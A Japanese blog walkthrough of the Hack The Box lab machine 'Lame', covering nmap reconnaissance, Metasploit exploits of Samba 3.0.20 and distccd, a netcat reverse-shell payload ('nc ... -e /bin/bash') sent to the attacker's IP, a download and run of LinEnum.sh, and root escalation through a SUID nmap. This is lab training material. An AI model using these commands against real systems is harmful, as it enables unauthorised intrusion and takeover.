偵察/スキャン
archtypeのコマンドを少し変えて実施しました。
ports=$(nmap -p- -T4 -P0 10.10.10.3 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -P0 -p$ports 10.10.10.3
※-P0:nmapによるスキャン実施の前にpingを送信しない。
2つ目のコマンドを実行すると以下の結果が得られます。
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Nmap scan report for 10.10.10.3
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 *1
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h10m36s, deviation: 2h49m43s, median: 10m35s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-04-26T21:48:50-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Nmap done: 1 IP address (1 host up) scanned in 54.24 seconds
余談:FTPで接続後にファイルの一覧が見れない
攻略の大筋ではないところで躓きました。
ftpが匿名アクセスできる状態なのでアクセスし、ファイル一覧を取得しようとしたところ、「425 Failed to establish connection.」のエラーが表示されました。
PASVモードの表示があったので、ufwにルールを追加し再度実行しましたが、同じエラーが表示されました。
ufw allow 20/tcp
ufw reload
ufw status numbered
www.secomtrust.net
正解としては「ftp>」の際に「passive」と実行することでftpのモードを切り替えて実行することで正常な結果が得られました。なお、接続したフォルダにはファイルはありませんでした。
アクセスの取得
ftpの攻略(失敗)
vsftp2.3.4はバックドアが含まれていますが、今回は使用できませんでした。
vsftp2.3.4の脆弱性攻撃(失敗)
sambaの攻略
metasploitを使って、sambaの脆弱性を攻撃します。
msfconsole
search samba 3.0.20
use exploit/multi/samba/usermap_script
「show options」で必要なオプションを指定して実行するとroot権限を得ることができました。/rootにroot.txtがあります。
distccの攻略
偵察/スキャンの結果で「3632/tcp open distccd」というサービスが稼働していることが確認できます。
distccとは
ソフトウェア開発においてdistccとは、コンピュータネットワーク上での分散コンピューティングを利用し、ソースコードのコンパイル速度を改善するツールである。
distcc - Wikipedia
distccに対してもmetasploitを使って攻撃を行います。
msfconsole
search distcc
use exploit/unix/misc/distcc_exec
今回はpayloadの指定で以下のものを使用しました。
set payload payload/cmd/unix/generic
set CMD nc 10.10.14.6 4444 -e /bin/bash
上記で「exploit」を実行すると、CMDに指定したコマンドがLameで実行されます。
ncコマンドで接続させるので、別ターミナルで待ち受けます。
nc- nc -lvnp 4444
ここまでで、daemonというユーザでアクセスすることができます。
daemonはroot権限がないため、ここから権限昇格を行います。
権限昇格
「LinEnum」というツールを使ってシステム内の情報を収集します。
Kali側ではLinEnum.shをダウンロードし、シェルが配置されているディレクトリでアクセスを待ち受けます。
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python3 -m http.server 80
先ほどLameにアクセスしたコンソールより以下を実行します。
wget http://kaliのIPアドレス:80/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
LinEnumの実行結果により、「/usr/bin/nmap」コマンドにrootのSUIDが設定されていることがわかります。
「GTFOBins」は、ローカルのセキュリティ制限を回避するため利用できるバイナリのリストで、このリストから「nmap」の項目を参照します。
上記の内容をもとに、Lameにアクセスしたコンソール上で以下のコマンドを実行するとroot権限を取得できました。
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.3] 45881
whoami
daemon
nmap --interactive
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
whoami
root
root権限の取得(イメージ)
参考にさせていただいたサイト
qiita.com
qiita.com
